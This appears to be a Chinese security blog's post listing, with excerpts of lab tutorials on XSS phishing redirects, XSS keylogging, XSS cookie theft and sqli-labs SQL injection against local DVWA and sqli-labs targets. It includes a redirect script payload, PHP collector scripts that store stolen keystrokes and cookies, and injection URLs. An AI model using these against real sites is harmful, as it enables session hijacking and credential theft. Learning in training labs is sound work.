- 博客(6)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 XSS总结
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗? 答:很大,是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
2020-11-19 22:04:58
1669
2
翻译 XSS漏洞钓鱼
实验环境 PHPstudy DVWA靶场 实验步骤 重定向钓鱼 1、把当前页面重定向到一个钓鱼页面,例如重定向到百度, <script>document.location.href="http://baidu.com"</script> 2、打开DVWA靶场 选择(XSS)stored 然后F12打开查看器,将输入限制值改的大一点 插入代码则会重定向到百度页面 ...
2020-11-19 00:33:31
520
原创 利用XSS实现受害者的键盘记录
实验环境: PHPstudy DVWA靶场 实验步骤: 1、在www目录下创建一个名为keylog.php的文件,代码如下: <?php $file = fopen("key.txt","a"); if(isset($_REQUEST['key'])) { $key = $_REQUEST['key']; fputs($file,$key); } ?> 2、进入DVWA靶机,级别调成low,选择(XSS)stored 3、F12打开查看器,将输入限制值改的大一点 4、将 <scri
2020-11-17 23:36:04
304
原创 xss获取cookie登陆
实验环境: phpstudy DVWA靶场 实验步骤 1、在phpstudy的www目录下创建一个名为1.php的文件,文件内容如下: <?php $file = fopen("1.txt","a"); if($_GET['cookie']){ $cookie = $_GET['cookie']; fputs ($file,"$cookie\n"); } ?> 2、进入DVWA靶机,级别调成low,选择(XSS)stored 3、F12打开查看器,将值改的大一点 4、将插入留言板中
2020-11-17 23:01:04
1149
原创 sqli-labs小游戏关(1-20)关详解
第一关 第一关是联合查询注入 判断注入点----判断是数字型还是字符型----查询列数----查询显示位----获取数据库名----获取数据库中的表名----获取列名----获取列中的数据 http://localhost/sqli-labs-master/Less-1/?id=1’ – - http://localhost/sqli-labs-master/Less-1/?id=1’ and 1=1-- - http://localhost/sqli-labs-master/Less-1/?id=1’
2020-10-22 16:38:48
1034
2
原创 MySQL数据库
MySQL数据库的话是一个关系型的数据库,可以理解为是由数据表组成的,是一个存储数据的仓库。 一个比较完整的数据库是由 数据表组成的,而创建数据表首先要创建数据库,然后再创建数据表,而在这过程中可能还需要修改数据库跟数据表中的内容,最后再查看、查找、利用这个数据库。 那我们就可以用"增删改查"的这个方式来理解和记忆这个命令。 增:包括数据库、数据表的创建跟数据的插入等。 create database 数据库名; 创建数据库 create table 数据表名 (id int(11),name va
2020-10-08 13:15:08
393
sqli-labs闯关小游戏21-65.docx
2020-10-23
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人